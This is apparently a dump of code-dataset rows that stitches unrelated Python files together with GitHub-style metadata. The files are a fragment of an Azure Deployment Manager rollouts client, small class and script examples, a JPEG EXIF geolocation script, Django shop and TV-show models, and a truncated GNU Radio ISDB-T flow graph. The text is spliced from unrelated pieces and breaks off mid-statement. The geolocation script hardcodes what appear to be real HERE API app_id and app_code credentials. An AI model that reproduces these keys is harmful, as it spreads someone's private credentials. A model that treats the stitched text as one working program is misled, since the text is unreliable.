get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> None:
"""Deletes a rollout resource.
Only rollouts in terminal state can be deleted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def cancel(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> "_models.Rollout":
"""Stops a running rollout.
Only running rollouts can be canceled.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.cancel.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/cancel'} # type: ignore
async def restart(
self,
resource_group_name: str,
rollout_name: str,
skip_succeeded: Optional[bool] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Restarts a failed rollout and optionally skips all succeeded steps.
Only failed rollouts can be restarted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param skip_succeeded: If true, will skip all succeeded steps so far in the rollout. If false,
will execute the entire rollout again regardless of the current state of individual resources.
Defaults to false if not specified.
:type skip_succeeded: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.restart.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip_succeeded is not None:
query_parameters['skipSucceeded'] = self._serialize.query("skip_succeeded", skip_succeeded, 'bool')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/restart'} # type: ignore
async def list(
self,
resource_group_name: str,
**kwargs: Any
) -> List["_models.Rollout"]:
"""Lists the rollouts in a resource group.
Lists the rollouts in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Rollout, or the result of cls(response)
:rtype: list[~azure.mgmt.deploymentmanager.models.Rollout]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.Rollout"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Rollout]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts'} # type: ignore
| [
"noreply@github.com"
] | noreply@github.com |
f1d6c053ab19fde48f2886203d3ce102e1ac3d2b | 4b558f3501407de951b686810794e18a4b2902cb | /Person.py | c90c6d96686ce2ae80fb8957e8f6434c2b1d0eb2 | [] | no_license | AmitGreen/TeacherSample | 05be63527b37f013adc6de6d8499668d717c8a73 | efb12aea1ac737d8ae2ab0ee8aa550adbd34edc1 | refs/heads/master | 2020-04-14T19:46:40.606477 | 2019-01-04T07:03:03 | 2019-01-04T07:13:57 | 164,070,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 661 | py | #
# Copyright (c) 2019 Amit Green. All rights reserved.
#
#
# Person
# Base class of Student and Teacher
#
class Person(object):
__slots__ = ((
'identifier', # PersonIdentifier
))
is_student = False
is_teacher = False
def __init__(self, identifier):
self.identifier = identifier
def __repr__(self):
return '<{} {!r} #{}>'.format(self.__class__.__name__, self.name, self.number)
@property
def name(self):
return self.identifier.name
@property
def number(self):
return self.identifier.number
#
# Exports
#
__all__ = ((
'Person',
))
| [
"amit.mixie@gmail.com"
] | amit.mixie@gmail.com |
f70cab19ea72af45550d3d357554c561f60bd2f2 | eb13de99f7092685cf7356cf3bff49342a070756 | /lab4/example3.py | 70f7f7d3a40059daaf8e6e55deb16fe689ac1dc5 | [] | no_license | e56485766/280201109 | 711874a84852e5160e9753c408462f6241a8f034 | 466a9a89e947e4515a6622d921b97979064fd518 | refs/heads/master | 2023-02-18T08:27:52.871387 | 2021-01-18T10:03:51 | 2021-01-18T10:03:51 | 311,320,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | nums = [8, 60, 43, 55, 25, 134, 1]
sum = 0
for i in nums:
sum += i
print(sum) | [
"ege_yucel_90@hotmail.com"
] | ege_yucel_90@hotmail.com |
b59746db08e06102b15d6584d17af086dbf60ad3 | 2354ad69c4134ab1141890f45007979614b6891a | /jpeg_location.py | d7fda35834c2f15abe808bf29bef451ffad11b34 | [] | no_license | dmullz/jpegLocationFinder | cad159ed1bda2da1e845d17009cfac2701f7696f | 7086a36d628dbcb41f4740bb37d2b24f0eba43aa | refs/heads/master | 2020-08-26T16:09:10.145197 | 2019-10-26T03:48:52 | 2019-10-26T03:48:52 | 217,067,645 | 0 | 0 | null | 2019-10-27T14:33:33 | 2019-10-23T13:42:38 | Python | UTF-8 | Python | false | false | 4,159 | py | from PIL import Image
from PIL.ExifTags import TAGS
from PIL.ExifTags import GPSTAGS
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import Font
import requests
import os
HERE_APP_ID = "vQCC4M7DiyR3w4sNySuk"
HERE_APP_CODE = "J0hDHbYEc9lf5WXlXszxCw"
# @DEV - Function to add a row to the excel file
# @param excel - string of file location of excel document
# @param filename - string of path to an image file
# @param location - string of the zip code parsed from image file
def add_to_excel(excel,filename,location):
# Format row
new_row = [filename,location]
# Load excel or build excel if this is the first one
try:
workbook = load_workbook(excel)
worksheet = workbook.worksheets[0]
except FileNotFoundError:
headers_row = ["Image File", "Zip Code"]
font = Font(bold=True)
workbook = Workbook()
worksheet = workbook.active
worksheet.append(headers_row)
for cell in worksheet["1:1"]:
cell.font = font
# Add row to Excel doc
worksheet.append(new_row)
workbook.save(excel)
# @DEV - Generator to get the next image file
# @param dir - directory containing image files (or singular file)
# @RET (string) - Yields a file to attempt to decode
def image_gen(dir):
if os.path.isfile(dir):
yield dir
else:
files = []
for (dirpath, dirnames, filenames) in os.walk(dir):
files.extend(filenames)
break
for file in files:
yield file
# @DEV - Function to find geotagging data in EXIF data
# @param exif - dictionary of EXIF data from a JPEG image
# @RET (dict) - returns a dictionary of geotagging data
def get_geotagging(exif):
if not exif:
raise ValueError("No EXIF metadata found")
print(GPSTAGS.items())
geotagging = {}
for (idx, tag) in TAGS.items():
if tag == 'GPSInfo':
if idx not in exif:
return None
for (key, val) in GPSTAGS.items():
if key in exif[idx]:
geotagging[val] = exif[idx][key]
return geotagging
# @DEV - Function to get the EXIF data in an image file.
# @param filename - string containing the path to a file
# @RET (dict) - returns a dictionary of EXIF data, or None if the file cannot be read or is not a JPEG
def get_exif(filename):
try:
image = Image.open(filename)
image.verify()
print("Image Info", image.info)
if image.format.lower() != 'jpeg':
print("File", filename, "is not a JPEG.")
return None
exif = image._getexif()
print("exif:",exif)
return exif
except:
print("There was a problem reading file", filename)
return None
# @DEV - Function to convert degrees, minutes, and seconds to a latitude/longitude
# @param dms - matrix of degrees, minutes, and seconds data
# @param ref - string of bearing information (N,S,E,W)
# @RET (float) - returns a float representing latitude/longitude coordinates
def get_decimal_from_dms(dms, ref):
degrees = dms[0][0] / dms[0][1]
minutes = dms[1][0] / dms[1][1] / 60.0
seconds = dms[2][0] / dms[2][1] / 3600.0
if ref in ['S', 'W']:
degrees = -degrees
minutes = -minutes
seconds = -seconds
return round(degrees + minutes + seconds, 5)
# @DEV - Function to get latitude/longitude from geotagging data
# @param geotags - dictionary of geotagging data
# @RET (tuple) - returns floats of latitude and longitude coordinates
def get_coordinates(geotags):
lat = get_decimal_from_dms(geotags['GPSLatitude'], geotags['GPSLatitudeRef'])
lon = get_decimal_from_dms(geotags['GPSLongitude'], geotags['GPSLongitudeRef'])
return (lat,lon)
# @DEV - Function to find location data from geotagging data in a JPEG
# @param geotags - dictionary of geotagging data
# @RET (dictionary) - returns JSON containing location data for the image
def get_location(geotags):
coords = get_coordinates(geotags)
uri = 'https://reverse.geocoder.api.here.com/6.2/reversegeocode.json'
headers = {}
params = {
'app_id': HERE_APP_ID,
'app_code': HERE_APP_CODE,
'prox': "%s,%s" % coords,
'gen': 9,
'mode': 'retrieveAddresses',
'maxresults': 1,
}
response = requests.get(uri, headers=headers, params=params)
try:
response.raise_for_status()
return response.json()
except requests.exceptions.HTTPError as e:
print(str(e))
return {} | [
"dangermouse12885@gmail.com"
] | dangermouse12885@gmail.com |
c6a4f7fd762b8c458facb55f5b26d1bc13b3c944 | e16d7d8f60145c68640b25aa7c259618be60d855 | /django_by_example/myshop/orders/admin.py | f09d215605498c4504e1c955a53d7fe07aa330af | [] | no_license | zongqiqi/mypython | bbe212223002dabef773ee0dbeafbad5986b4639 | b80f3ce6c30a0677869a7b49421a757c16035178 | refs/heads/master | 2020-04-21T07:39:59.594233 | 2017-12-11T00:54:44 | 2017-12-11T00:54:44 | 98,426,286 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from django.contrib import admin
from .models import Order,OrderItem
class OrderItemInline(admin.TabularInline):
model = OrderItem
raw_id_fields = ['product']
class OrderAdmin(admin.ModelAdmin):
list_display = ['id', 'first_name', 'last_name', 'email','address', 'postal_code', 'city', 'paid','created', 'updated']
list_filter = ['paid', 'created', 'updated']
inlines = [OrderItemInline]#使用OrderItemline来把OrderItem引用为OrderAdmin类的内联类
#内联类允许你在同一个编辑页面引用模型,并且将这个模型作为父模型
admin.site.register(Order, OrderAdmin) | [
"544136329@qq.com"
] | 544136329@qq.com |
3ce9ae75cfba581fd1556d6acba08d404943f333 | 89ab7ddfbf71e67a07b81592376d365e487e7ab2 | /python_stack/django/django_full_stack/tv_shows_project/tv_shows_app/models.py | 5c09f7cd3b6d029a237a44bcf5b6c35b19d500e9 | [] | no_license | napatpiya/bootcamp | b9ec8b57f2bde960893fead2cd199d218d197128 | 456d71fbc87a3fac5fac2386ea5b5914a3b35141 | refs/heads/master | 2023-05-27T07:12:48.392117 | 2020-06-30T02:58:47 | 2020-06-30T02:58:47 | 237,839,511 | 0 | 0 | null | 2023-05-07T22:20:16 | 2020-02-02T21:28:10 | Python | UTF-8 | Python | false | false | 1,488 | py | from django.db import models
import datetime
# Create your models here.
class ValiManager(models.Manager):
def validator(self, postData, request):
errors = {}
print(datetime.date.today())
print(postData['reldate'])
present = datetime.date.today()
reldate = datetime.datetime.strptime(postData['reldate'], "%Y-%m-%d").date()
print(reldate > present)
if len(postData['title']) < 2:
errors["title"] = "Title name should be at least 2 characters"
if request.session['check'] == 1:
errors["title"] = "The title already exist in the database"
if len(postData['network']) < 3:
errors["network"] = "Network name should be at least 3 characters"
if postData['reldate'] == '':
errors['reldate'] = "Release Date should not be null"
if reldate > present:
errors['reldate'] = "Release Date should be the past"
if len(postData['desc']) != 0 and len(postData['desc']) < 10:
errors['desc'] = "Description name should be at least 10 characters (Optional)"
return errors
class TvShows(models.Model):
title = models.CharField(max_length=45)
network = models.CharField(max_length=20)
releasedate = models.DateField(null=True, blank=True)
description = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = ValiManager()
| [
"napat_ont@hotmail.com"
] | napat_ont@hotmail.com |
ad95a02abfd27b13261a61ab7c66af089dff71c2 | 57baad3ff3081f0e70f61c8613d4a5033303712a | /top_block.py | 8e1ab040cf61c24c71277661792878294035abd9 | [] | no_license | miliheredia8/ISDB-T | 5d8c6bc118008ff0f1508956a063eda3da1ff162 | 25d2f71674d44b549b9b5feba07c9f9a35eba161 | refs/heads/master | 2022-12-07T00:51:29.179071 | 2020-09-06T19:11:06 | 2020-09-06T19:11:06 | 281,508,279 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86,625 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Top Block
# Generated: Tue Jul 21 09:49:44 2020
##################################################
from distutils.version import StrictVersion
if __name__ == '__main__':
    import ctypes
    import sys

    if sys.platform.startswith('linux'):
        try:
            # Enable multi-threaded Xlib access before any Qt/GUI code runs;
            # without XInitThreads() the X11 backend is not thread-safe and
            # the Qt sinks in this flow graph can crash the display.
            x11 = ctypes.cdll.LoadLibrary('libX11.so')
            x11.XInitThreads()
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are not swallowed. Failure here is non-fatal (e.g. headless or
            # non-X11 session); just warn and continue.
            print("Warning: failed to XInitThreads()")
from PyQt5 import Qt
from PyQt5 import Qt, QtCore
from gnuradio import analog
from gnuradio import blocks
from gnuradio import channels
from gnuradio import digital
from gnuradio import dtv
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from gnuradio.qtgui import Range, RangeWidget
from optparse import OptionParser
import isdbt
import mer
import numpy as np
import pmt
import sip
import sys
from gnuradio import qtgui
class top_block(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Top Block")
Qt.QWidget.__init__(self)
self.setWindowTitle("Top Block")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "top_block")
self.restoreGeometry(self.settings.value("geometry", type=QtCore.QByteArray))
##################################################
# Variables
##################################################
self.samp_rate = samp_rate = 8e6*64/63
self.taps = taps = firdes.low_pass(1.0, samp_rate, 1e6, 6e6, firdes.WIN_HAMMING, 6.76)
self.mode = mode = 3
self.total_carriers = total_carriers = 2**(10+mode)
self.symbol_table_QPSK = symbol_table_QPSK = (1+1j, 1-1j, -1+1j, -1-1j)/np.sqrt(2)
self.symbol_table_64QAM = symbol_table_64QAM = (7+7j, 7+5j, 5+7j, 5+5j, 7+1j, 7+3j, 5+1j, 5+3j, 1+7j, 1+5j, 3+7j, 3+5j, 1+1j, 1+3j, 3+1j, 3+3j, 7-7j, 7-5j, 5-7j, 5-5j, 7-1j, 7-3j, 5-1j, 5-3j, 1-7j, 1-5j, 3-7j, 3-5j, 1-1j, 1-3j, 3-1j, 3-3j, -7+7j, -7+5j, -5+7j, -5+5j, -7+1j, -7+3j, -5+1j, -5+3j, -1+7j, -1+5j, -3+7j, -3+5j, -1+1j, -1+3j, -3+1j, -3+3j, -7-7j, -7-5j, -5-7j, -5-5j, -7-1j, -7-3j, -5-1j, -5-3j, -1-7j, -1-5j, -3-7j, -3-5j, -1-1j, -1-3j, -3-1j, -3-3j)/np.sqrt(42)
self.segments_c = segments_c = 0
self.segments_b = segments_b = 12
self.segments_a = segments_a = 1
self.phase_noise = phase_noise = 0
self.noise_volt = noise_volt = 0
self.length_c = length_c = 0
self.length_b = length_b = 2
self.length_a = length_a = 4
self.guard = guard = 1.0/16
self.frec_offset = frec_offset = 0
self.delay = delay = (len(taps)/2)-1
self.data_carriers = data_carriers = 13*96*2**(mode-1)
self.bb_gain = bb_gain = 0.0022097087
self.TOI = TOI = 0
self.SOI = SOI = 0
self.Quad_Offset = Quad_Offset = 0
self.Infase_Offset = Infase_Offset = 0
self.IQ_Phase_Imbalance = IQ_Phase_Imbalance = 0
self.IQ_Mag_Imbalance = IQ_Mag_Imbalance = 0
self.AjusteMascara = AjusteMascara = 0
##################################################
# Blocks
##################################################
self.tab = Qt.QTabWidget()
self.tab_widget_0 = Qt.QWidget()
self.tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.tab_widget_0)
self.tab_grid_layout_0 = Qt.QGridLayout()
self.tab_layout_0.addLayout(self.tab_grid_layout_0)
self.tab.addTab(self.tab_widget_0, 'Medici\xc3\xb3n MER')
self.top_grid_layout.addWidget(self.tab)
self._phase_noise_range = Range(-50, 50, 1, 0, 200)
self._phase_noise_win = RangeWidget(self._phase_noise_range, self.set_phase_noise, 'Channel: Phase Noise', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._phase_noise_win, 3, 0, 1, 2)
for r in range(3, 4):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._noise_volt_range = Range(0, 1, 1e-3, 0, 200)
self._noise_volt_win = RangeWidget(self._noise_volt_range, self.set_noise_volt, 'Channel: Noise Voltage', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._noise_volt_win, 1, 0, 1, 2)
for r in range(1, 2):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._frec_offset_range = Range(-5e-3, 5e-3, 0.5e-3, 0, 200)
self._frec_offset_win = RangeWidget(self._frec_offset_range, self.set_frec_offset, 'Channel: Frequency Offset', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._frec_offset_win, 2, 0, 1, 2)
for r in range(2, 3):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._bb_gain_range = Range(0, 1, 1e-6, 0.0022097087, 200)
self._bb_gain_win = RangeWidget(self._bb_gain_range, self.set_bb_gain, "bb_gain", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._bb_gain_win, 0, 0, 1, 2)
for r in range(0, 1):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._TOI_range = Range(0, 120, 1, 0, 200)
self._TOI_win = RangeWidget(self._TOI_range, self.set_TOI, "TOI", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._TOI_win, 1, 2, 1, 3)
for r in range(1, 2):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._SOI_range = Range(0, 10, 1, 0, 200)
self._SOI_win = RangeWidget(self._SOI_range, self.set_SOI, "SOI", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._SOI_win, 0, 2, 1, 3)
for r in range(0, 1):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._Quad_Offset_range = Range(0, 100, 1, 0, 200)
self._Quad_Offset_win = RangeWidget(self._Quad_Offset_range, self.set_Quad_Offset, "Quad_Offset", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._Quad_Offset_win, 2, 2, 1, 3)
for r in range(2, 3):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._Infase_Offset_range = Range(0, 10, 0.5, 0, 200)
self._Infase_Offset_win = RangeWidget(self._Infase_Offset_range, self.set_Infase_Offset, "Infase_Offset", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._Infase_Offset_win, 3, 2, 1, 3)
for r in range(3, 4):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._IQ_Phase_Imbalance_range = Range(0, 90, 1, 0, 200)
self._IQ_Phase_Imbalance_win = RangeWidget(self._IQ_Phase_Imbalance_range, self.set_IQ_Phase_Imbalance, "IQ_Phase_Imbalance", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._IQ_Phase_Imbalance_win, 4, 2, 1, 3)
for r in range(4, 5):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(2, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._IQ_Mag_Imbalance_range = Range(0, 50, 1, 0, 200)
self._IQ_Mag_Imbalance_win = RangeWidget(self._IQ_Mag_Imbalance_range, self.set_IQ_Mag_Imbalance, "IQ_Mag_Imbalance", "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._IQ_Mag_Imbalance_win, 4, 0, 1, 2)
for r in range(4, 5):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(0, 2):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self._AjusteMascara_range = Range(0, 100, 1, 0, 200)
self._AjusteMascara_win = RangeWidget(self._AjusteMascara_range, self.set_AjusteMascara, 'Ajuste mascara', "counter_slider", float)
self.tab_grid_layout_0.addWidget(self._AjusteMascara_win, 9, 1, 1, 2)
for r in range(9, 10):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 3):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_vector_sink_f_0 = qtgui.vector_sink_f(
4096,
-(samp_rate/2)/1e6,
(samp_rate/4096)/1e6,
'MHz',
'dBm',
"Espectro de RF",
4 # Number of inputs
)
self.qtgui_vector_sink_f_0.set_update_time(0.10)
self.qtgui_vector_sink_f_0.set_y_axis(-100, -0)
self.qtgui_vector_sink_f_0.enable_autoscale(False)
self.qtgui_vector_sink_f_0.enable_grid(True)
self.qtgui_vector_sink_f_0.set_x_axis_units("")
self.qtgui_vector_sink_f_0.set_y_axis_units("")
self.qtgui_vector_sink_f_0.set_ref_level(0)
labels = ['Espectro Se\xc3\xb1al', 'M\xc3\xa1scara No Cr\xc3\xadtica', 'M\xc3\xa1scara Sub-Cr\xc3\xadtica', 'M\xc3\xa1scara Cr\xc3\xadtica', '',
'', '', '', '', '']
widths = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
colors = ["blue", "red", "green", "black", "cyan",
"magenta", "yellow", "dark red", "dark green", "dark blue"]
alphas = [1.0, 1.0, 1.0, 1.0, 1.0,
1.0, 1.0, 1.0, 1.0, 1.0]
for i in xrange(4):
if len(labels[i]) == 0:
self.qtgui_vector_sink_f_0.set_line_label(i, "Data {0}".format(i))
else:
self.qtgui_vector_sink_f_0.set_line_label(i, labels[i])
self.qtgui_vector_sink_f_0.set_line_width(i, widths[i])
self.qtgui_vector_sink_f_0.set_line_color(i, colors[i])
self.qtgui_vector_sink_f_0.set_line_alpha(i, alphas[i])
self._qtgui_vector_sink_f_0_win = sip.wrapinstance(self.qtgui_vector_sink_f_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_vector_sink_f_0_win, 7, 1, 2, 3)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(1, 4):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_number_sink_0_0 = qtgui.number_sink(
gr.sizeof_float,
0,
qtgui.NUM_GRAPH_VERT,
1
)
self.qtgui_number_sink_0_0.set_update_time(0.10)
self.qtgui_number_sink_0_0.set_title("Modulation Error Rate - RMS")
labels = ['', '', '', '', '',
'', '', '', '', '']
units = ['', '', '', '', '',
'', '', '', '', '']
colors = [("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"),
("black", "black"), ("black", "black"), ("black", "black"), ("black", "black"), ("black", "black")]
factor = [1, 1, 1, 1, 1,
1, 1, 1, 1, 1]
for i in xrange(1):
self.qtgui_number_sink_0_0.set_min(i, 0)
self.qtgui_number_sink_0_0.set_max(i, 50)
self.qtgui_number_sink_0_0.set_color(i, colors[i][0], colors[i][1])
if len(labels[i]) == 0:
self.qtgui_number_sink_0_0.set_label(i, "Data {0}".format(i))
else:
self.qtgui_number_sink_0_0.set_label(i, labels[i])
self.qtgui_number_sink_0_0.set_unit(i, units[i])
self.qtgui_number_sink_0_0.set_factor(i, factor[i])
self.qtgui_number_sink_0_0.enable_autoscale(False)
self._qtgui_number_sink_0_0_win = sip.wrapinstance(self.qtgui_number_sink_0_0.pyqwidget(), Qt.QWidget)
self.tab_grid_layout_0.addWidget(self._qtgui_number_sink_0_0_win, 7, 4, 2, 1)
for r in range(7, 9):
self.tab_grid_layout_0.setRowStretch(r, 1)
for c in range(4, 5):
self.tab_grid_layout_0.setColumnStretch(c, 1)
self.qtgui_const_sink_x_0_0 = qtgui.const_sink_c(
1024, #size
"Constelación", #name
